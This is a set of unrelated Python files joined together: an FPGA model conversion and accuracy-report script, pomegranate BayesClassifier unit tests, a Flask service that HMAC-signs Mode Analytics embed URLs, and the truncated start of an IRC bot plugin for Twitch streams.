# %% Conversion and building
print('Converting from keras to HLS...')
# removing previous FPGA project folder/files
print('\tremoving previous {model} FPGA project folder/files'.format(model=model.name))
os.system('rm {prj_folder}* -r'.format(prj_folder=FPGA_PROJECT_FOLDER))
# model conversion
print('\tConverting {model} according to {config}'.format(model=model.name, config=CONFIG_FILE))
convert(CONFIG_FILE)
# model building
print('\tBuilding HLS project into {prj_folder}'.format(prj_folder=FPGA_PROJECT_FOLDER))
build(FPGA_PROJECT_FOLDER)
#%% Parse FPGA report
print('\nGenerating FPGA synth report')
REPORT_FILE = FPGA_FOLDER + HLS_PROJECT + '/' + FPGA_PROJECT + '_prj/solution1/solution1_data.json'
report = fpga_report(REPORT_FILE, FPGA_PROJECT)
for k in report.keys():
print('{}:'.format(k))
for l in report[k]:
print('\t{}: {}'.format(l, report[k][l]))
print('\nSaving FPGA synth report')
with open(OUTPUT_FOLDER+FPGA_PROJECT+'_report.json', 'w') as f:
json.dump(report, f)
#%% Module reloading for inference
print('\nReloading model to obtain classification performance metrics')
if do_model_checkout:
model = load_model(MODEL_NAME, path=MODEL_DST_PATH, verbose=1)
else:
model = load_model(MODEL_NAME, path=MODEL_SRC_PATH, verbose=1)
#%% Inferences
print('\tPerforming original model inferences')
# convert y to class format
y_train_class = np.argmax(y_train, axis=1)
y_test_class = np.argmax(y_test, axis=1)
# original model inferences
y_train_pred = model.predict(x_train)
y_test_pred = model.predict(x_test)
y_train_class_pred = np.argmax(y_train_pred, axis=1)
y_test_class_pred = np.argmax(y_test_pred, axis=1)
print('\tPerforming FPGA implementation inference over test dataset')
# inference with the original model using the test data exported for the FPGA
# read data used for HLS simulation
x_fpga = np.genfromtxt(DATA_FOLDER+TEST_FILES[0], delimiter=' ').astype(np.float32)
# do inference with original model
y_fpga_best_pred = model.predict(x_fpga)
# convert predictions to class numbers
y_fpga_class_best_pred = np.argmax(y_fpga_best_pred, axis=1)
#%% accuracy metrics
print('\nAccuracy report')
model_train_acc = np.mean(y_train_class_pred == y_train_class)
print('\tOriginal model inference train accuracy = {:.4f}'.format(model_train_acc))
model_test_acc = np.mean(y_test_class_pred == y_test_class)
print('\tOriginal model inference test accuracy = {:.4f}'.format(model_test_acc))
fpga_best_acc = np.mean(y_fpga_class_best_pred == y_test_class)
print('\tFPGA expected inference accuracy = {:.4f}'.format(fpga_best_acc))
# read data from HLS simulation
y_fpga_pred = np.genfromtxt(FPGA_INFERENCE_FILE, delimiter=' ')
# convert predictions to class numbers
y_fpga_class_pred = np.argmax(y_fpga_pred, axis=1)
# accuracy
fpga_acc = np.mean(y_fpga_class_pred == y_test_class)
print('\tFPGA inference accuracy = {:.4f}'.format(fpga_acc))
metric_report = {'acc': {
'model_train_acc': model_train_acc,
'model_test_acc': model_test_acc,
'fpga_best_acc': fpga_best_acc,
'fpga_acc': fpga_acc
}}
# %% Whole report
report.update(parameter_report)
report.update(metric_report)
# save report
with open(OUTPUT_REPORT_FILE, 'w') as f:
json.dump(report, f, indent=4)
#%% IP checkout
print('\nIP checkout:')
# check if you are not in a ipython notebook
if not isnotebook():
terminal_input = input('Do you want to checkout FPGA IP generated (it overrides previous IP with same name) y/[n]: ')
if terminal_input == 'y':
do_ip_checkout = True
else:
do_ip_checkout = False
print('IP checkout denied!')
if do_ip_checkout:
print('Doing IP checkout...')
ip_checkout(model.name, src_path=IP_SRC_PATH, dst_path=IP_DST_PATH)
else:
print('Your IP has not been checked out, look for it in ' + IP_DST_PATH )
# %%
print('\n Run is complete!')
|
StarcoderdataPython
|
2409
|
from __future__ import (division)
from pomegranate import *
from pomegranate.io import DataGenerator
from pomegranate.io import DataFrameGenerator
from nose.tools import with_setup
from nose.tools import assert_almost_equal
from nose.tools import assert_equal
from nose.tools import assert_not_equal
from nose.tools import assert_less_equal
from nose.tools import assert_raises
from nose.tools import assert_true
from numpy.testing import assert_array_almost_equal
import pandas
import random
import pickle
import numpy as np
nan = numpy.nan
def setup_multivariate_gaussian():
mu, cov = [0, 0, 0], numpy.eye(3)
d1 = MultivariateGaussianDistribution(mu, cov)
mu, cov = [2, 2, 2], numpy.eye(3)
d2 = MultivariateGaussianDistribution(mu, cov)
global model
model = BayesClassifier([d1, d2])
global X
X = numpy.array([[ 0.3, 0.5, 0.1],
[ 0.8, 1.4, 0.5],
[ 1.4, 2.6, 1.8],
[ 4.2, 3.3, 3.7],
[ 2.6, 3.6, 3.3],
[ 3.1, 2.2, 1.7],
[ 1.8, 2.2, 1.8],
[-1.2, -1.8, -1.5],
[-1.8, 0.3, 0.5],
[ 0.7, -1.3, -0.1]])
global y
y = [0, 0, 0, 1, 1, 1, 1, 0, 0, 0]
global X_nan
X_nan = numpy.array([[ 0.3, nan, 0.1],
[ nan, 1.4, nan],
[ 1.4, 2.6, nan],
[ nan, nan, nan],
[ nan, 3.6, 3.3],
[ 3.1, nan, 1.7],
[ nan, nan, 1.8],
[-1.2, -1.8, -1.5],
[ nan, 0.3, 0.5],
[ nan, -1.3, nan]])
def setup_multivariate_mixed():
mu, cov = [0, 0, 0], numpy.eye(3)
d1 = MultivariateGaussianDistribution(mu, cov)
d21 = ExponentialDistribution(5)
d22 = LogNormalDistribution(0.2, 0.8)
d23 = PoissonDistribution(3)
d2 = IndependentComponentsDistribution([d21, d22, d23])
global model
model = BayesClassifier([d1, d2])
global X
X = numpy.array([[ 0.3, 0.5, 0.1],
[ 0.8, 1.4, 0.5],
[ 1.4, 2.6, 1.8],
[ 4.2, 3.3, 3.7],
[ 2.6, 3.6, 3.3],
[ 3.1, 2.2, 1.7],
[ 1.8, 2.2, 1.8],
[ 1.2, 1.8, 1.5],
[ 1.8, 0.3, 0.5],
[ 0.7, 1.3, 0.1]])
global y
y = [0, 0, 0, 1, 1, 1, 1, 0, 0, 0]
global X_nan
X_nan = numpy.array([[ 0.3, nan, 0.1],
[ nan, 1.4, nan],
[ 1.4, 2.6, nan],
[ nan, nan, nan],
[ nan, 3.6, 3.3],
[ 3.1, nan, 1.7],
[ nan, nan, 1.8],
[ 1.2, 1.8, 1.5],
[ nan, 0.3, 0.5],
[ nan, 1.3, nan]])
def setup_hmm():
global model
global hmm1
global hmm2
global hmm3
rigged = State( DiscreteDistribution({ 'H': 0.8, 'T': 0.2 }) )
unrigged = State( DiscreteDistribution({ 'H': 0.5, 'T':0.5 }) )
hmm1 = HiddenMarkovModel()
hmm1.start = rigged
hmm1.add_transition(rigged, rigged, 1)
hmm1.bake()
hmm2 = HiddenMarkovModel()
hmm2.start = unrigged
hmm2.add_transition(unrigged, unrigged, 1)
hmm2.bake()
hmm3 = HiddenMarkovModel()
hmm3.add_transition(hmm3.start, unrigged, 0.5)
hmm3.add_transition(hmm3.start, rigged, 0.5)
hmm3.add_transition(rigged, rigged, 0.5)
hmm3.add_transition(rigged, unrigged, 0.5)
hmm3.add_transition(unrigged, rigged, 0.5)
hmm3.add_transition(unrigged, unrigged, 0.5)
hmm3.bake()
model = BayesClassifier([hmm1, hmm2, hmm3])
def setup_multivariate():
pass
def teardown():
pass
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_initialization():
assert_equal(model.d, 3)
assert_equal(model.n, 2)
assert_equal(model.is_vl_, False)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_initialization():
assert_equal(model.d, 3)
assert_equal(model.n, 2)
assert_equal(model.is_vl_, False)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_predict_log_proba():
y_hat = model.predict_log_proba(X)
y = [[ -1.48842547e-02, -4.21488425e+00],
[ -4.37487950e-01, -1.03748795e+00],
[ -5.60369104e+00, -3.69104343e-03],
[ -1.64000001e+01, -7.54345812e-08],
[ -1.30000023e+01, -2.26032685e-06],
[ -8.00033541e+00, -3.35406373e-04],
[ -5.60369104e+00, -3.69104343e-03],
[ -3.05902274e-07, -1.50000003e+01],
[ -3.35406373e-04, -8.00033541e+00],
[ -6.11066022e-04, -7.40061107e+00]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_predict_log_proba():
y_hat = model.predict_log_proba(X)
y = [[ -5.03107596e-01, -9.27980626e-01],
[ -1.86355320e-01, -1.77183117e+00],
[ -5.58542088e-01, -8.48731256e-01],
[ -7.67315597e-01, -6.24101927e-01],
[ -2.32860808e+00, -1.02510436e-01],
[ -3.06641866e-03, -5.78877778e+00],
[ -9.85292840e-02, -2.36626165e+00],
[ -2.61764180e-01, -1.46833995e+00],
[ -2.01640009e-03, -6.20744952e+00],
[ -1.47371167e-01, -1.98758175e+00]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_nan_predict_log_proba():
y_hat = model.predict_log_proba(X_nan)
y = [[ -3.99533332e-02, -3.23995333e+00],
[ -1.17110067e+00, -3.71100666e-01],
[ -4.01814993e+00, -1.81499279e-02],
[ -6.93147181e-01, -6.93147181e-01],
[ -9.80005545e+00, -5.54500620e-05],
[ -5.60369104e+00, -3.69104343e-03],
[ -1.78390074e+00, -1.83900741e-01],
[ -3.05902274e-07, -1.50000003e+01],
[ -8.68361522e-02, -2.48683615e+00],
[ -1.00016521e-02, -4.61000165e+00]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_nan_predict_log_proba():
y_hat = model.predict_log_proba(X_nan)
y = [[ -3.57980882e-01, -1.20093223e+00],
[ -1.20735130e+00, -3.55230506e-01],
[ -2.43174286e-01, -1.53310132e+00],
[ -6.93147181e-01, -6.93147181e-01],
[ -9.31781101e+00, -8.98143220e-05],
[ -6.29755079e-04, -7.37049444e+00],
[ -1.31307006e+00, -3.13332194e-01],
[ -2.61764180e-01, -1.46833995e+00],
[ -2.29725479e-01, -1.58353505e+00],
[ -1.17299253e+00, -3.70251760e-01]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_predict_log_proba_parallel():
y_hat = model.predict_log_proba(X, n_jobs=2)
y = [[ -1.48842547e-02, -4.21488425e+00],
[ -4.37487950e-01, -1.03748795e+00],
[ -5.60369104e+00, -3.69104343e-03],
[ -1.64000001e+01, -7.54345812e-08],
[ -1.30000023e+01, -2.26032685e-06],
[ -8.00033541e+00, -3.35406373e-04],
[ -5.60369104e+00, -3.69104343e-03],
[ -3.05902274e-07, -1.50000003e+01],
[ -3.35406373e-04, -8.00033541e+00],
[ -6.11066022e-04, -7.40061107e+00]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_predict_log_proba_parallel():
y_hat = model.predict_log_proba(X, n_jobs=2)
y = [[ -5.03107596e-01, -9.27980626e-01],
[ -1.86355320e-01, -1.77183117e+00],
[ -5.58542088e-01, -8.48731256e-01],
[ -7.67315597e-01, -6.24101927e-01],
[ -2.32860808e+00, -1.02510436e-01],
[ -3.06641866e-03, -5.78877778e+00],
[ -9.85292840e-02, -2.36626165e+00],
[ -2.61764180e-01, -1.46833995e+00],
[ -2.01640009e-03, -6.20744952e+00],
[ -1.47371167e-01, -1.98758175e+00]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_predict_proba():
y_hat = model.predict_proba(X)
y = [[ 9.85225968e-01, 1.47740317e-02],
[ 6.45656306e-01, 3.54343694e-01],
[ 3.68423990e-03, 9.96315760e-01],
[ 7.54345778e-08, 9.99999925e-01],
[ 2.26032430e-06, 9.99997740e-01],
[ 3.35350130e-04, 9.99664650e-01],
[ 3.68423990e-03, 9.96315760e-01],
[ 9.99999694e-01, 3.05902227e-07],
[ 9.99664650e-01, 3.35350130e-04],
[ 9.99389121e-01, 6.10879359e-04]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_predict_proba():
y_hat = model.predict_proba(X)
y = [[ 0.60464873, 0.39535127],
[ 0.82997863, 0.17002137],
[ 0.57204244, 0.42795756],
[ 0.46425765, 0.53574235],
[ 0.09743127, 0.90256873],
[ 0.99693828, 0.00306172],
[ 0.90616916, 0.09383084],
[ 0.76969251, 0.23030749],
[ 0.99798563, 0.00201437],
[ 0.86297361, 0.13702639]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_nan_predict_proba():
y_hat = model.predict_proba(X_nan)
y = [[ 9.60834277e-01, 3.91657228e-02],
[ 3.10025519e-01, 6.89974481e-01],
[ 1.79862100e-02, 9.82013790e-01],
[ 5.00000000e-01, 5.00000000e-01],
[ 5.54485247e-05, 9.99944551e-01],
[ 3.68423990e-03, 9.96315760e-01],
[ 1.67981615e-01, 8.32018385e-01],
[ 9.99999694e-01, 3.05902227e-07],
[ 9.16827304e-01, 8.31726965e-02],
[ 9.90048198e-01, 9.95180187e-03]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_nan_predict_proba():
y_hat = model.predict_proba(X_nan)
y = [[ 6.99086440e-01, 3.00913560e-01],
[ 2.98988163e-01, 7.01011837e-01],
[ 7.84134838e-01, 2.15865162e-01],
[ 5.00000000e-01, 5.00000000e-01],
[ 8.98102888e-05, 9.99910190e-01],
[ 9.99370443e-01, 6.29556825e-04],
[ 2.68992964e-01, 7.31007036e-01],
[ 7.69692511e-01, 2.30307489e-01],
[ 7.94751748e-01, 2.05248252e-01],
[ 3.09439547e-01, 6.90560453e-01]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_predict_proba_parallel():
y_hat = model.predict_proba(X, n_jobs=2)
y = [[ 9.85225968e-01, 1.47740317e-02],
[ 6.45656306e-01, 3.54343694e-01],
[ 3.68423990e-03, 9.96315760e-01],
[ 7.54345778e-08, 9.99999925e-01],
[ 2.26032430e-06, 9.99997740e-01],
[ 3.35350130e-04, 9.99664650e-01],
[ 3.68423990e-03, 9.96315760e-01],
[ 9.99999694e-01, 3.05902227e-07],
[ 9.99664650e-01, 3.35350130e-04],
[ 9.99389121e-01, 6.10879359e-04]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_predict_proba_parallel():
y_hat = model.predict_proba(X, n_jobs=2)
y = [[ 0.60464873, 0.39535127],
[ 0.82997863, 0.17002137],
[ 0.57204244, 0.42795756],
[ 0.46425765, 0.53574235],
[ 0.09743127, 0.90256873],
[ 0.99693828, 0.00306172],
[ 0.90616916, 0.09383084],
[ 0.76969251, 0.23030749],
[ 0.99798563, 0.00201437],
[ 0.86297361, 0.13702639]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_predict():
y_hat = model.predict(X)
y = [0, 0, 1, 1, 1, 1, 1, 0, 0, 0]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_predict():
y_hat = model.predict(X)
y = [0, 0, 0, 1, 1, 0, 0, 0, 0, 0]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_nan_predict():
y_hat = model.predict(X_nan)
y = [0, 1, 1, 0, 1, 1, 1, 0, 0, 0]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_nan_predict():
y_hat = model.predict(X_nan)
y = [0, 1, 0, 0, 1, 0, 1, 0, 0, 1]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_predict_parallel():
y_hat = model.predict(X, n_jobs=2)
y = [0, 0, 1, 1, 1, 1, 1, 0, 0, 0]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_predict_parallel():
y_hat = model.predict(X, n_jobs=2)
y = [0, 0, 0, 1, 1, 0, 0, 0, 0, 0]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_fit_parallel():
model.fit(X, y, n_jobs=2)
mu1 = model.distributions[0].parameters[0]
cov1 = model.distributions[0].parameters[1]
mu1_t = [0.03333333, 0.28333333, 0.21666666]
cov1_t = [[1.3088888, 0.9272222, 0.6227777],
[0.9272222, 2.2513888, 1.3402777],
[0.6227777, 1.3402777, 0.9547222]]
mu2 = model.distributions[1].parameters[0]
cov2 = model.distributions[1].parameters[1]
mu2_t = [2.925, 2.825, 2.625]
cov2_t = [[0.75687499, 0.23687499, 0.4793750],
[0.23687499, 0.40187499, 0.5318749],
[0.47937500, 0.53187499, 0.7868750]]
assert_array_almost_equal(mu1, mu1_t)
assert_array_almost_equal(cov1, cov1_t)
assert_array_almost_equal(mu2, mu2_t)
assert_array_almost_equal(cov2, cov2_t)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_fit_parallel():
model.fit(X, y, n_jobs=2)
mu1 = model.distributions[0].parameters[0]
cov1 = model.distributions[0].parameters[1]
mu1_t = [1.033333, 1.3166667, 0.75]
cov1_t = [[0.242222, 0.0594444, 0.178333],
[0.059444, 0.5980555, 0.414166],
[0.178333, 0.4141666, 0.439166]]
d21 = model.distributions[1].distributions[0]
d22 = model.distributions[1].distributions[1]
d23 = model.distributions[1].distributions[2]
assert_array_almost_equal(mu1, mu1_t)
assert_array_almost_equal(cov1, cov1_t)
assert_array_almost_equal(d21.parameters, [0.34188034])
assert_array_almost_equal(d22.parameters, [1.01294275, 0.22658346])
assert_array_almost_equal(d23.parameters, [2.625])
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_from_samples():
model = BayesClassifier.from_samples(MultivariateGaussianDistribution, X, y)
mu1 = model.distributions[0].parameters[0]
cov1 = model.distributions[0].parameters[1]
mu1_t = [0.03333333, 0.2833333, 0.21666666]
cov1_t = [[1.308888888, 0.9272222222, 0.6227777777],
[0.927222222, 2.251388888, 1.340277777],
[0.622777777, 1.340277777, 0.9547222222]]
mu2 = model.distributions[1].parameters[0]
cov2 = model.distributions[1].parameters[1]
mu2_t = [2.925, 2.825, 2.625]
cov2_t = [[0.75687500, 0.23687499, 0.47937500],
[0.23687499, 0.40187499, 0.53187499],
[0.47937500, 0.53187499, 0.78687500]]
assert_array_almost_equal(mu1, mu1_t)
assert_array_almost_equal(cov1, cov1_t)
assert_array_almost_equal(mu2, mu2_t)
assert_array_almost_equal(cov2, cov2_t)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_pickle():
model2 = pickle.loads(pickle.dumps(model))
assert_true(isinstance(model2, BayesClassifier))
assert_true(isinstance(model2.distributions[0], MultivariateGaussianDistribution))
assert_true(isinstance(model2.distributions[1], MultivariateGaussianDistribution))
assert_array_almost_equal(model.weights, model2.weights)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_pickle():
model2 = pickle.loads(pickle.dumps(model))
assert_true(isinstance(model2, BayesClassifier))
assert_true(isinstance(model2.distributions[0], MultivariateGaussianDistribution))
assert_true(isinstance(model2.distributions[1], IndependentComponentsDistribution))
assert_array_almost_equal(model.weights, model2.weights)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_to_json():
model2 = BayesClassifier.from_json(model.to_json())
assert_true(isinstance(model2, BayesClassifier))
assert_true(isinstance(model2.distributions[0], MultivariateGaussianDistribution))
assert_true(isinstance(model2.distributions[1], MultivariateGaussianDistribution))
assert_array_almost_equal(model.weights, model2.weights)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_to_json():
model2 = BayesClassifier.from_json(model.to_json())
assert_true(isinstance(model2, BayesClassifier))
assert_true(isinstance(model2.distributions[0], MultivariateGaussianDistribution))
assert_true(isinstance(model2.distributions[1], IndependentComponentsDistribution))
assert_array_almost_equal(model.weights, model2.weights)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_robust_from_json():
model2 = from_json(model.to_json())
assert_true(isinstance(model2, BayesClassifier))
assert_true(isinstance(model2.distributions[0], MultivariateGaussianDistribution))
assert_true(isinstance(model2.distributions[1], MultivariateGaussianDistribution))
assert_array_almost_equal(model.weights, model2.weights)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_robust_from_json():
model2 = from_json(model.to_json())
assert_true(isinstance(model2, BayesClassifier))
assert_true(isinstance(model2.distributions[0], MultivariateGaussianDistribution))
assert_true(isinstance(model2.distributions[1], IndependentComponentsDistribution))
assert_array_almost_equal(model.weights, model2.weights)
@with_setup(setup_hmm, teardown)
def test_model():
assert_almost_equal(hmm1.log_probability(list('H')), -0.2231435513142097 )
assert_almost_equal(hmm1.log_probability(list('T')), -1.6094379124341003 )
assert_almost_equal(hmm1.log_probability(list('HHHH')), -0.8925742052568388 )
assert_almost_equal(hmm1.log_probability(list('THHH')), -2.2788685663767296 )
assert_almost_equal(hmm1.log_probability(list('TTTT')), -6.437751649736401 )
assert_almost_equal(hmm2.log_probability(list('H')), -0.6931471805599453 )
assert_almost_equal(hmm2.log_probability(list('T')), -0.6931471805599453 )
assert_almost_equal(hmm2.log_probability(list('HHHH')), -2.772588722239781 )
assert_almost_equal(hmm2.log_probability(list('THHH')), -2.772588722239781 )
assert_almost_equal(hmm2.log_probability(list('TTTT')), -2.772588722239781 )
assert_almost_equal(hmm3.log_probability(list('H')), -0.43078291609245417)
assert_almost_equal(hmm3.log_probability(list('T')), -1.0498221244986776)
assert_almost_equal(hmm3.log_probability(list('HHHH')), -1.7231316643698167)
assert_almost_equal(hmm3.log_probability(list('THHH')), -2.3421708727760397)
assert_almost_equal(hmm3.log_probability(list('TTTT')), -4.1992884979947105)
assert_almost_equal(hmm3.log_probability(list('THTHTHTHTHTH')), -8.883630243546788)
assert_almost_equal(hmm3.log_probability(list('THTHHHHHTHTH')), -7.645551826734343)
assert_equal(model.d, 1)
@with_setup(setup_hmm, teardown)
def test_hmm_log_proba():
logs = model.predict_log_proba(np.array([list('H'), list('THHH'), list('TTTT'), list('THTHTHTHTHTH'), list('THTHHHHHTHTH')]))
assert_almost_equal(logs[0][0], -0.89097292388986515)
assert_almost_equal(logs[0][1], -1.3609765531356006)
assert_almost_equal(logs[0][2], -1.0986122886681096)
assert_almost_equal(logs[1][0], -0.93570553121744293)
assert_almost_equal(logs[1][1], -1.429425687080494)
assert_almost_equal(logs[1][2], -0.9990078376167526)
assert_almost_equal(logs[2][0], -3.9007882563128864)
assert_almost_equal(logs[2][1], -0.23562532881626597)
assert_almost_equal(logs[2][2], -1.6623251045711958)
assert_almost_equal(logs[3][0], -3.1703366478831185)
assert_almost_equal(logs[3][1], -0.49261403211260379)
assert_almost_equal(logs[3][2], -1.058478108940049)
assert_almost_equal(logs[4][0], -1.3058441172130273)
assert_almost_equal(logs[4][1], -1.4007102236822906)
assert_almost_equal(logs[4][2], -0.7284958836972919)
@with_setup(setup_hmm, teardown)
def test_hmm_proba():
probs = model.predict_proba(np.array([list('H'), list('THHH'), list('TTTT'), list('THTHTHTHTHTH'), list('THTHHHHHTHTH')]))
assert_almost_equal(probs[0][0], 0.41025641025641024)
assert_almost_equal(probs[0][1], 0.25641025641025639)
assert_almost_equal(probs[0][2], 0.33333333333333331)
assert_almost_equal(probs[1][0], 0.39230898163446098)
assert_almost_equal(probs[1][1], 0.23944639992337707)
assert_almost_equal(probs[1][2], 0.36824461844216183)
assert_almost_equal(probs[2][0], 0.020225961918306088)
assert_almost_equal(probs[2][1], 0.79007663743383105)
assert_almost_equal(probs[2][2], 0.18969740064786292)
assert_almost_equal(probs[3][0], 0.041989459861032523)
assert_almost_equal(probs[3][1], 0.61102706038265642)
assert_almost_equal(probs[3][2], 0.346983479756311)
assert_almost_equal(probs[4][0], 0.27094373022369794)
assert_almost_equal(probs[4][1], 0.24642188711704707)
assert_almost_equal(probs[4][2], 0.48263438265925512)
@with_setup(setup_hmm, teardown)
def test_hmm_prediction():
predicts = model.predict(np.array([list('H'), list('THHH'), list('TTTT'), list('THTHTHTHTHTH'), list('THTHHHHHTHTH')]))
assert_equal(predicts[0], 0)
assert_equal(predicts[1], 0)
assert_equal(predicts[2], 1)
assert_equal(predicts[3], 1)
assert_equal(predicts[4], 2)
@with_setup(setup_multivariate_gaussian, teardown)
def test_io_log_probability():
X2 = DataGenerator(X)
X3 = DataFrameGenerator(pandas.DataFrame(X))
logp1 = model.log_probability(X)
logp2 = model.log_probability(X2)
logp3 = model.log_probability(X3)
assert_array_almost_equal(logp1, logp2)
assert_array_almost_equal(logp1, logp3)
@with_setup(setup_multivariate_gaussian, teardown)
def test_io_predict():
X2 = DataGenerator(X)
X3 = DataFrameGenerator(pandas.DataFrame(X))
y_hat1 = model.predict(X)
y_hat2 = model.predict(X2)
y_hat3 = model.predict(X3)
assert_array_almost_equal(y_hat1, y_hat2)
assert_array_almost_equal(y_hat1, y_hat3)
@with_setup(setup_multivariate_gaussian, teardown)
def test_io_predict_proba():
X2 = DataGenerator(X)
X3 = DataFrameGenerator(pandas.DataFrame(X))
y_hat1 = model.predict_proba(X)
y_hat2 = model.predict_proba(X2)
y_hat3 = model.predict_proba(X3)
assert_array_almost_equal(y_hat1, y_hat2)
assert_array_almost_equal(y_hat1, y_hat3)
@with_setup(setup_multivariate_gaussian, teardown)
def test_io_predict_log_proba():
X2 = DataGenerator(X)
X3 = DataFrameGenerator(pandas.DataFrame(X))
y_hat1 = model.predict_log_proba(X)
y_hat2 = model.predict_log_proba(X2)
y_hat3 = model.predict_log_proba(X3)
assert_array_almost_equal(y_hat1, y_hat2)
assert_array_almost_equal(y_hat1, y_hat3)
def test_io_fit():
X = numpy.random.randn(100, 5) + 0.5
weights = numpy.abs(numpy.random.randn(100))
y = numpy.random.randint(2, size=100)
data_generator = DataGenerator(X, weights, y)
mu1 = numpy.array([0, 0, 0, 0, 0])
mu2 = numpy.array([1, 1, 1, 1, 1])
cov = numpy.eye(5)
d1 = MultivariateGaussianDistribution(mu1, cov)
d2 = MultivariateGaussianDistribution(mu2, cov)
bc1 = BayesClassifier([d1, d2])
bc1.fit(X, y, weights)
d1 = MultivariateGaussianDistribution(mu1, cov)
d2 = MultivariateGaussianDistribution(mu2, cov)
bc2 = BayesClassifier([d1, d2])
bc2.fit(data_generator)
logp1 = bc1.log_probability(X)
logp2 = bc2.log_probability(X)
assert_array_almost_equal(logp1, logp2)
def test_io_from_samples():
X = numpy.random.randn(100, 5) + 0.5
weights = numpy.abs(numpy.random.randn(100))
y = numpy.random.randint(2, size=100)
data_generator = DataGenerator(X, weights, y)
d = MultivariateGaussianDistribution
bc1 = BayesClassifier.from_samples(d, X=X, y=y, weights=weights)
bc2 = BayesClassifier.from_samples(d, X=data_generator)
logp1 = bc1.log_probability(X)
logp2 = bc2.log_probability(X)
assert_array_almost_equal(logp1, logp2)
|
StarcoderdataPython
|
1878965
|
#!env python3
from flask import Flask, request, redirect
from hashlib import sha256
import hmac
import base64
import time
import urllib.parse
# allow for relative importing if run directly
if __name__ == "__main__":
from config import secrets, reports, listen_port
else:
from .config import secrets, reports, listen_port
app = Flask(__name__)
@app.route('/report/<report>')
def sign_report_url(report):
# check for a valid token
provided_token = request.args.get('token') or 'missing'
if provided_token != secrets.get('access_token'):
return "Missing or incorrect token provided"
# lookup report and generate URL from values
if report in reports:
this_report = reports.get(report)
# Generating the embed URL
mode_report_id = this_report.get('mode_report')
param_name = this_report.get('param_name')
param_value = request.args.get(
'account_id') or this_report.get('param_default_value')
do_iframe = request.args.get('iframe') or False
timestamp = str(int(time.time())) # current time in unix time
url = make_url('https://app.mode.com', secrets.get('mode_team'), 'reports',
mode_report_id, 'embed', access_key=secrets.get('mode_access_key'),
max_age=3600, **{param_name: param_value}, run='now', timestamp=timestamp)
else:
return f"Missing report {report}"
request_type = 'GET'
content_type = ''
# the MD5 digest of an empty content body, always the same, :shrug:
content_digest = '1B2M2Y8AsgTpgAmY7PhCfg=='
# signature fodder
request_string = ','.join(
[request_type, content_type, str(content_digest), url, timestamp])
signature = hmac.new(bytes(secrets.get('mode_access_secret'), 'utf-8'),
bytes(request_string, 'utf-8'), digestmod=sha256).hexdigest()
signed_url = '%s&signature=%s' % (url, signature)
if do_iframe is not False:
# return the signed URL as an iframe
return f"""
        <iframe src='{signed_url}' width='100%' height='100%' frameborder='0'></iframe>
"""
else:
# return the signed URL as a redirect
return redirect(signed_url, code=302)
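# For reference, the string signed above has the form (values illustrative):
#   "GET,,1B2M2Y8AsgTpgAmY7PhCfg==,<embed url>,<unix timestamp>"
# i.e. request type, empty content type, content digest, URL and timestamp joined by commas;
# the HMAC-SHA256 of that string (keyed with mode_access_secret) is appended as &signature=.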
def make_url(base_url, *res, **params):
url = base_url
for r in res:
url = '{}/{}'.format(url, r)
if params:
url = '{}?{}'.format(url, urllib.parse.urlencode(params))
return url
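# Example of make_url() output ('myteam' and 'abc123' are made-up values):
#   make_url('https://app.mode.com', 'myteam', 'reports', 'abc123', 'embed', run='now')
#   -> 'https://app.mode.com/myteam/reports/abc123/embed?run=now'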
@app.route('/status')
def status():
return 'Success'
if __name__ == "__main__":
app.run(host='0.0.0.0', port=listen_port)
|
StarcoderdataPython
|
4914264
|
import willie, sys, json
from os.path import expanduser
def setup(bot):
global twitchlist
with open("{0}/.willie/conf-module/streams.json".format(expanduser("~"))) as f: # loads streams.json from USER_HOME/.willie/conf-module/
twitchlist = json.load(f)
def lookup_twitch():
global twitchlist
twitchers = []
for twitcher in twitchlist["streamlist"]:
